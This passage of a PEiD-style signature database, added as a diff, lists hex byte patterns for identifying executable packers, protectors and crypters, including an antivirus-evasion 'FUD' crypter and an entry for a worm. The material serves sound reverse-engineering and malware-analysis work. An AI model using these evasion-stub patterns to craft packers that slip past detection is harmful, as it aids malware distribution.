+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 ?? ?? ?? ?? 5E B9 00 00 00 00 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake Microsoft Visual C++ 7.0) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 89 65 00 8B F4 89 3E 56 FF 15 ?? ?? ?? ?? 8B 4E ?? 89 0D ?? ?? ?? 00 8B 46 00 A3
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake PE Lock NT 2.04) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake PE-Crypt 1.02) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake PESHiELD 2.x) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake PEtite 2.2) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake Spalsher 1.x-3.x) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 9C 60 8B 44 24 24 E8 00 00 00 00 5D 81 ED 00 00 00 00 50 E8 ED 02 00 00 8C C0 0F 84
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake Stone's PE Encryptor 2.0) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 51 52 56 57 55 E8 00 00 00 00 5D 81 ED 42 30 40 00 FF 95 32 35 40 00 B8 37 30 40 00 03 C5 2B 85 1B 34 40 00 89 85 27 34 40 00 83
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake SVKP 1.3x) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 00 00 00 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake tElock 0.61) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 F3 EB FF E0 83 C0 28 50 E8 00 00 00 00 5E B3 33 8D 46 0E 8D 76 31 28 18 F8 73 00 C3 8B FE B9 3C 02
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake VIRUS/I-Worm Hybris) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 16 A8 54 00 00 47 41 42 4C 4B 43 47 43 00 00 00 00 00 00 52 49 53 00 FC 68 4C 70 40 00 FF 15
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake VOB ProtectCD) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 5F 81 EF 00 00 00 00 BE 00 00 40 00 8B 87 00 00 00 00 03 C6 57 56 8C A7 00 00 00 00 FF 10 89 87 00 00 00 00 5E 5F
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake Xtreme-Protector 1.05) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5D 81 00 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake ZCode 1.01) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35
+ep_only = true
+
+[AI1 Creator 1 Beta 2 - by MZ]
+signature = E8 FE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00
+ep_only = false
+
+[AINEXE v2.1]
+signature = A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 36 A3 ?? ?? 05 ?? ?? 36 A3 ?? ?? 2E A1 ?? ?? 8A D4 B1 04 D2 EA FE C9
+ep_only = true
+
+[AINEXE v2.30]
+signature = 0E 07 B9 ?? ?? BE ?? ?? 33 FF FC F3 A4 A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8
+ep_only = true
+
+[Alex Protector 1.0 beta 2 by Alex]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B 44 24 0C EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 83 80 B8 00 00 00 02 33 C0 EB 01 E9 C3 58 83 C4 04 EB 03 EB 03 C7 EB FB E8 01 00 00 00 A8 83 C4 04 50 64 FF 35 00 00 00 00 64 89 25
+ep_only = false
+
+[Alex Protector v0.4 beta 1 by Alex]
+signature = 60 E8 01 00 00 00 C7 83 C4 04 33 C9 E8 01 00 00 00 68 83 C4 04 E8 01 00 00 00 68 83 C4 04 B9 ?? 00 00 00 E8 01 00 00 00 68 83 C4 04 E8 00 00 00 00 E8 01 00 00 00 C7 83 C4 04 8B 2C 24 83 C4 04 E8 01 00 00 00 A9 83 C4 04 81 ED 3C 13 40 00 E8 01 00 00 00 68
+ep_only = false
+
+[Alex Protector v1.0 -> Alex]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B
+ep_only = true
+
+[Alloy 4.x -> PGWare LLC]
+signature = 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 6A 04 68 00 10 00 00 68 00 02 00 00 6A 00 FF 95 A8 33 40 00 0B C0 0F 84 F6 01 00 00 89 85 2E 33 40 00 83 BD E8 32 40 00 01 74 0D 83 BD E4 32 40 00 01 74 2A 8B F8 EB 3E 68
+ep_only = true
+
+[Alloy v1.x.2000]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 46 23 40 ?? 0B
+ep_only = true
+
+[Aluwain v8.09]
+signature = 8B EC 1E E8 ?? ?? 9D 5E
+ep_only = true
+
+[ANDpakk2 0.06 -> Dmitry Andreev]
+signature = 60 FC BE D4 00 40 00 BF 00 10 00 01 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3
+ep_only = false
+
+[ANDpakk2 0.18 - by Dmitry "AND" Andreev]
+signature = FC BE D4 00 40 00 BF 00 ?? ?? 00 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3
+ep_only = true
+
+[Anskya Binder v1.1 -> Anskya]
+signature = BE ?? ?? ?? 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11
+ep_only = true
+
+[Anskya NTPacker Generator -> Anskya]
+signature = 55 8B EC 83 C4 F0 53 B8 88 1D 00 10 E8 C7 FA FF FF 6A 0A 68 20 1E 00 10 A1 14 31 00 10 50 E8 71 FB FF FF 8B D8 85 DB 74 2F 53 A1 14 31 00 10 50 E8 97 FB FF FF 85 C0 74 1F 53 A1 14 31 00 10 50 E8 5F FB FF FF 85 C0 74 0F 50 E8 5D FB FF FF 85 C0 74 05 E8 70 FC FF FF 5B E8 F2 F6 FF FF 00 00 48 45 41 52 54
+ep_only = false
+
+[Anslym Crypter]
+signature = 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A 68 30 1C 05 10 A1 60 56 05 10 50 E8 68 47 FB FF 8B D8 85 DB 0F 84 B6 02 00 00 53 A1 60 56 05 10 50 E8 F2 48 FB FF 8B F0 85 F6 0F 84 A0 02 00 00 E8 F3
+ep_only = true
+
+[Anslym FUD Crypter]
+signature = 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A
+ep_only = true
+
+[Anti007 V2.6 -> LiuXingPing]
+signature = 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 57 72 69 74 65 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00
+ep_only = false
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 04 24 06 C3 ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[AntiDote 1.0 Beta -> SIS-Team]
+signature = E8 BB FF FF FF 84 C0 74 2F 68 04 01 00 00 68 C0 23 60 00 6A 00 FF 15 08 10 60 00 E8 40 FF FF FF 50 68 78 11 60 00 68 68 11 60 00 68 C0 23 60 00 E8 AB FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 66 8B 41 06 89 54 24 14 8D 68 FF 85 ED 7C 37 33 C0
+ep_only = true
+
+[AntiDote 1.0 Demo / 1.2 -> SIS-Team]
+signature = 00 00 00 00 09 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 DB 01 47 65 74 56 65 72 73 69 6F 6E 45 78 41 00 73 01 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 00 7A 03 57 61 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 00 BF 02 52 65 73 75 6D 65 54 68 72 65 61 64 00 00 29 03 53 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 94 03 57 72 69 74 65 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 00 6B 03 56 69 72 74 75 61 6C 41 6C 6C 6F 63 45 78 00 00 A6 02 52 65 61 64 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 CA 01 47 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 62 00 43 72 65 61 74 65 50 72 6F 63 65 73 73 41 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C
+ep_only = false
+
+[AntiDote 1.2 Beta (Demo) -> SIS-Team]
+signature = 68 69 D6 00 00 E8 C6 FD FF FF 68 69 D6 00 00 E8 BC FD FF FF 83 C4 08 E8 A4 FF FF FF 84 C0 74 2F 68 04 01 00 00 68 B0 21 60 00 6A 00 FF 15 08 10 60 00 E8 29 FF FF FF 50 68 88 10 60 00 68 78 10 60 00 68 B0 21 60 00 E8 A4 FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 90 90 90 90 90 90 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0
+ep_only = true
+
+[AntiDote 1.2.Demo -> SIS-Team]
+signature = E8 F7 FE FF FF 05 CB 22 00 00 FF E0 E8 EB FE FF FF 05 BB 19 00 00 FF E0 E8 BD 00 00 00 08 B2 62 00 01 52 17 0C 0F 2C 2B 20 7F 52 79 01 30 07 17 29 4F 01 3C 30 2B 5A 3D C7 26 11 26 06 59 0E 78 2E 10 14 0B 13 1A 1A 3F 64 1D 71 33 57 21 09 24 8B 1B 09 37 08 61 0F 1D 1D 2A 01 87 35 4C 07 39 0B
+ep_only = false
+
+[AntiDote 1.2.DLL.Demo -> SIS-Team]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF
+ep_only = false
+
+[AntiDote 1.2/1.4 SE DLL -> SIS-Team]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC 11 DB
+ep_only = true
+
+[AntiDote 1.4 SE -> SIS-Team]
+signature = 68 90 03 00 00 E8 C6 FD FF FF 68 90 03 00 00 E8 BC FD FF FF 68 90 03 00 00 E8 B2 FD FF FF 50 E8 AC FD FF FF 50 E8 A6 FD FF FF 68 69 D6 00 00 E8 9C FD FF FF 50 E8 96 FD FF FF 50 E8 90 FD FF FF 83 C4 20 E8 78 FF FF FF 84 C0 74 4F 68 04 01 00 00 68 10 22 60 00 6A 00 FF 15 08 10 60 00 68 90 03 00 00 E8 68 FD FF FF 68 69 D6 00 00 E8 5E FD FF FF 50 E8 58 FD FF FF 50 E8 52 FD FF FF E8 DD FE FF FF 50 68 A4 10 60 00 68 94 10 60 00 68 10 22 60 00 E8 58 FD FF FF 83 C4 20 33 C0 C2 10 00 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3
+ep_only = true
+
+[AntiVirus Vaccine v.1.03]
+signature = FA 33 DB B9 ?? ?? 0E 1F 33 F6 FC AD 35 ?? ?? 03 D8 E2
+ep_only = true
+
+[aPack v0.62]
+signature = 1E 06 8C C8 8E D8 ?? ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B6
+ep_only = true
+
+[aPack v0.82]
+signature = 1E 06 8C CB BA ?? ?? 03 DA 8D ?? ?? ?? FC 33 F6 33 FF 48 4B 8E C0 8E DB
+ep_only = true
+
+[aPack v0.98 -m]
+signature = 1E 06 8C C8 8E D8 05 ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B2 ?? BD ?? ?? 33 C9 50 A4 BB ?? ?? 3B F3 76
+ep_only = false
+
+[aPack v0.98b (DS&ES not saved)]
+signature = 8C CB BA ?? ?? 03 DA FC 33 F6 33 FF 4B 8E DB 8D ?? ?? ?? 8E C0 B9 ?? ?? F3 A5 4A 75
+ep_only = false
+
+[aPack v0.98b -> Jibz]
+signature = 93 07 1F 05 ?? ?? 8E D0 BC ?? ?? EA
+ep_only = false
+
+[APatch GUI v1.1]
+signature = 52 31 C0 E8 FF FF FF FF
+ep_only = true
+
+[Apex 3.0 alpha -> 500mhz]
+signature = 5F B9 14 00 00 00 51 BE 00 10 40 00 B9 00 ?? ?? 00 8A 07 30 06 46 E2 FB 47 59 E2 EA 68 ?? ?? ?? 00 C3
+ep_only = false
+
+[APEX_C (BLT Apex 4.0) -> 500mhz]
+signature = 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3
+ep_only = true
+
+[Apex_c beta -> 500mhz]
+signature = 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[App Encryptor -> Silent Team]
+signature = 60 E8 00 00 00 00 5D 81 ED 1F 1F 40 00 B9 7B 09 00 00 8D BD 67 1F 40 00 8B F7 AC
+ep_only = true
+
+[App Protector -> Silent Team]
+signature = E9 97 00 00 00 0D 0A 53 69 6C 65 6E 74 20 54 65 61 6D 20 41 70 70 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 72 65 61 74 65 64 20 62 79 20 53 69 6C 65 6E 74 20 53 6F 66 74 77 61 72 65 0D 0A 54 68 65 6E 6B 7A 20 74 6F 20 44 6F 63 68 74 6F 72 20 58 0D 0A 0D 0A
+ep_only = true
+
+[ARC-SFX Archive]
+signature = 8C C8 8C DB 8E D8 8E C0 89 ?? ?? ?? 2B C3 A3 ?? ?? 89 ?? ?? ?? BE ?? ?? B9 ?? ?? BF ?? ?? BA ?? ?? FC AC 32 C2 8A D8
+ep_only = true
+
+[ARM Protector 0.1 - by SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4
+ep_only = true
+
+[ARM Protector 0.3 - by SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 13 24 40 00 EB 02 83 09 8D B5 A4 24 40 00 EB 02 83 09 BA 4B 15 00 00 EB 01 00 8D 8D EF 39 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4
+ep_only = false
+
+[ARM Protector v0.1 by SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0
+ep_only = false
+
+[ARM Protector v0.2-> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 09 20 40 00 EB 02 83 09 8D B5 9A 20 40 00 EB 02 83 09 BA 0B 12 00 00 EB 01 00 8D 8D A5 32 40 00
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F
+ep_only = true
+
+[Armadillo 3.X-5.X -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 60 33 C9 75 02 EB 15 EB 33
+ep_only = true
+
+[Armadillo 4.30a -> Silicon Realms Toolworks]
+signature = 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 41 4E 53 49 29 2C 20 61 70 70 20 73 74 72 69 6E 67 73 20 61 72 65 20 27 25 73 27 20 61 6E 64 20 27 25 73 27 00 00 00 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 55 4E 49 43
+ep_only = false
+
+[Armadillo 4.40 -> Silicon Realms Toolworks]
